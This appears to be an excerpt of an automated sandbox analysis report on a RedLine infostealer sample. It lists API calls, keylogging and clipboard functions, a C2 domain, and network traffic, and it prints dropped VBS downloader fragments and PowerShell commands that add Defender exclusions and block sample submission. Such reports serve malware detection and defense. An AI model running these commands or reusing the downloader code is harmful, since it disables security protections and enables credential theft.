Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Code function: 10_2_00A79E43 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	10_2_00A79E43
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Code function: 10_2_00A79F9E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	10_2_00A79F9E
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Code function: 13_2_0060E334 GetFileAttributesW,FindFirstFileW,FindClose,	13_2_0060E334
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Code function: 13_2_0061A32C FindFirstFileW,Sleep,FindNextFileW,FindClose,	13_2_0061A32C
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Code function: 13_2_006165AE FindFirstFileW,FindNextFileW,FindClose,	13_2_006165AE
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Code function: 13_2_00617205 FindFirstFileW,FindClose,	13_2_00617205
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Code function: 13_2_006172A6 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,	13_2_006172A6
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Code function: 13_2_0060D7CC FindFirstFileW,DeleteFileW,CompareStringW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	13_2_0060D7CC
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Code function: 13_2_0060DB0B FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	13_2_0060DB0B
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Code function: 13_2_00619E43 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	13_2_00619E43
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Code function: 13_2_00619F9E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	13_2_00619F9E

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\wscript.exe

Network Connect: 185.199.111.133 443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 21jhss.club:80

Potential malicious VBS script found (has network functionality)

Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Dropped file: adodb.Write xmlHttp.ResponseBody	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Dropped file: adodb.SaveToFile name	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Dropped file: "obf_objADOStream.Write obf_objXMLHTTP.ResponseBody" & vbCrLf & _	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Dropped file: "obf_objADOStream.SaveToFile obf_path" & vbCrLf & _	Jump to dropped file
Source: C:\Windows\SysWOW64\cscript.exe	Dropped file: oZ.Write BR.ResponseBody	Jump to dropped file
Source: C:\Windows\SysWOW64\cscript.exe	Dropped file: oZ.SaveToFile qR	Jump to dropped file

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 30

Yara detected Generic Downloader

Source: Yara match	File source: 19.2.RegAsm.exe.580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.3.Rifiutare.exe.com.4680aa0.0.raw.unpack, type: UNPACKEDPE

Source: Joe Sandbox View

IP Address: 185.199.111.133 185.199.111.133

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic

Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49842 -> 185.199.111.133:443

Source: global traffic

HTTP traffic detected: GET /asmtron/rdpwrap/master/bin/autoupdate.bat HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-CHUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: raw.githubusercontent.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com

Code function: 7_2_00CAD672 InternetReadFile,SetEvent,GetLastError,SetEvent,

7_2_00CAD672

Source: global traffic

Source: global traffic	DNS traffic detected: DNS query: QPFIkBuKoDrrKMiLWzroGJvlan.QPFIkBuKoDrrKMiLWzroGJvlan
Source: global traffic	DNS traffic detected: DNS query: lYvskCQZEcQueZ.lYvskCQZEcQueZ
Source: global traffic	DNS traffic detected: DNS query: bDbFlwFKtaJzIIkBijTv.bDbFlwFKtaJzIIkBijTv
Source: global traffic	DNS traffic detected: DNS query: 21jhss.club
Source: global traffic	DNS traffic detected: DNS query: raw.githubusercontent.com

Source: 8lOT1rXZp5.exe, 00000000.00000003.1682764178.0000000004BDB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: 8lOT1rXZp5.exe, 00000000.00000003.1682764178.0000000004BDB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: 8lOT1rXZp5.exe, 00000000.00000003.1682764178.0000000004BDB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: 8lOT1rXZp5.exe, 00000000.00000003.1682764178.0000000004BDB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: 8lOT1rXZp5.exe, 00000000.00000003.1682764178.0000000004BDB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: 8lOT1rXZp5.exe, 00000000.00000003.1682764178.0000000004BDB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: 8lOT1rXZp5.exe, 00000000.00000003.1682764178.0000000004BDB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: 8lOT1rXZp5.exe, 00000000.00000003.1682764178.0000000004BDB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: 8lOT1rXZp5.exe, 00000000.00000003.1682764178.0000000004BDB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: 8lOT1rXZp5.exe, 00000000.00000003.1682764178.0000000004BDB000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmp, Rifiutare.exe.com, 00000009.00000000.1706363695.0000000000D05000.00000002.00000001.01000000.00000006.sdmp, Uno.exe.com, 0000000A.00000000.1707300131.0000000000AD5000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: Rifiutare.exe.com, 00000009.00000003.1972771955.0000000004640000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000009.00000003.1972771955.000000000465A000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000009.00000003.1973535617.00000000046BE000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000009.00000003.1972870705.00000000046C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb/geoipAppData
Source: Rifiutare.exe.com, 00000009.00000003.1972771955.0000000004640000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000009.00000003.1972771955.000000000465A000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000009.00000003.1973535617.00000000046BE000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000009.00000003.1972870705.00000000046C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
Source: Rifiutare.exe.com, 00000009.00000003.1972771955.0000000004640000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000009.00000003.1972771955.000000000465A000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000009.00000003.1973535617.00000000046BE000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000009.00000003.1972870705.00000000046C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://icanhazip.com5https://wtfismyip.com/textChttp://bot.whatismyipaddress.com/3http://checkip.dy
Source: Rifiutare.exe.com, 00000009.00000003.1972771955.0000000004640000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000009.00000003.1972771955.000000000465A000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000009.00000003.1973535617.00000000046BE000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000009.00000003.1972870705.00000000046C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/ip%appdata%
Source: wscript.exe	String found in binary or memory: https://raw.githubusercontent.com/asmtron/rdpwrap/master/bin/autoupda
Source: cscript.exe, 00000026.00000003.2706083010.0000000002FEA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/asmtron/rdpwrap/master/bin/autoupdate.bat
Source: 8lOT1rXZp5.exe, 00000000.00000003.1682764178.0000000004BDB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: 8lOT1rXZp5.exe, 00000000.00000003.1682764178.0000000004BDB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.globalsign.com/repository/0
Source: 8lOT1rXZp5.exe, 00000000.00000003.1682764178.0000000004BDB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.globalsign.com/repository/06

Source: unknown	Network traffic detected: HTTP traffic on port 49842 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49842

Source: unknown

HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.4:49842 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to register a low level keyboard hook

Source: C:\Users\user\Desktop\8lOT1rXZp5.exe

Code function: 0_2_00408E84 SetWindowsHookExW 00000002,Function_00008E56,00000000,00000000

0_2_00408E84

Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com

Code function: 7_2_00CAF345 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

7_2_00CAF345

Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Code function: 7_2_00CAF5B0 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,	7_2_00CAF5B0
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Code function: 10_2_00A7F5B0 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,	10_2_00A7F5B0
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Code function: 13_2_0061F5B0 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,	13_2_0061F5B0

Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com

7_2_00CAF345

Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com

Code function: 7_2_00C9A492 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

7_2_00C9A492

Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Code function: 7_2_00CC9B7E DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,	7_2_00CC9B7E
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Code function: 10_2_00A99B7E DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,	10_2_00A99B7E
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Code function: 13_2_00639B7E DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,	13_2_00639B7E

System Summary

Malicious sample detected (through community Yara rule)

Source: 9.3.Rifiutare.exe.com.4680aa0.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 9.3.Rifiutare.exe.com.4680aa0.0.unpack, type: UNPACKEDPE	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 9.3.Rifiutare.exe.com.4680aa0.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 19.2.RegAsm.exe.580000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 19.2.RegAsm.exe.580000.0.unpack, type: UNPACKEDPE	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 19.2.RegAsm.exe.580000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 9.3.Rifiutare.exe.com.4680aa0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 9.3.Rifiutare.exe.com.4680aa0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 9.3.Rifiutare.exe.com.4680aa0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000009.00000003.1972771955.0000000004640000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 00000013.00000002.2943468774.0000000000582000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 00000009.00000003.1972771955.000000000465A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 00000009.00000003.1972870705.00000000046C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: Process Memory Space: Rifiutare.exe.com PID: 2896, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown

Potential malicious VBS script found (suspicious strings)

Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Dropped file: Set xmlHttp = CreateObject("MSXML2.ServerXMLHTTP.6.0")	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Dropped file: Set xmlHttp = CreateObject("MSXML2.ServerXMLHTTP.6.0")	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Dropped file: "Set obf_objXMLHTTP=CreateObject(""MSXML2.ServerXMLHTTP.6.0"")" & vbCrLf & _	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Dropped file: "Set obf_objXMLHTTP=CreateObject(""MSXML2.ServerXMLHTTP.6.0"")" & vbCrLf & _	Jump to dropped file
Source: C:\Windows\SysWOW64\cscript.exe	Dropped file: Set BR=CreateObject("MSXML2.ServerXMLHTTP.6.0")	Jump to dropped file
Source: C:\Windows\SysWOW64\cscript.exe	Dropped file: Set BR=CreateObject("MSXML2.ServerXMLHTTP.6.0")	Jump to dropped file

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\System32\wscript.exe	COM Object queried: Server XML HTTP 6.0 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{88d96a0b-f192-11d4-a65f-0040963251e5}
Source: C:\Windows\System32\wscript.exe	COM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2087c2f4-2cef-4953-a8ab-66779b670495}

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath ""$env:ProgramFiles""
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath ""$env:Appdata""
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionProcess "C:\Windows\System32\wscript.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\UeNuQ\BACCrSAh.bat
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Program Files\RDP Wrapper\rdpwrap.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath ""$env:ProgramFiles""
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath ""$env:Appdata""
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionProcess "C:\Windows\System32\wscript.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\UeNuQ\BACCrSAh.bat
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Program Files\RDP Wrapper\rdpwrap.bat" "

Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com

Code function: 7_2_00CA4635: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,

7_2_00CA4635

Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com

Code function: 7_2_00C91A7B LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

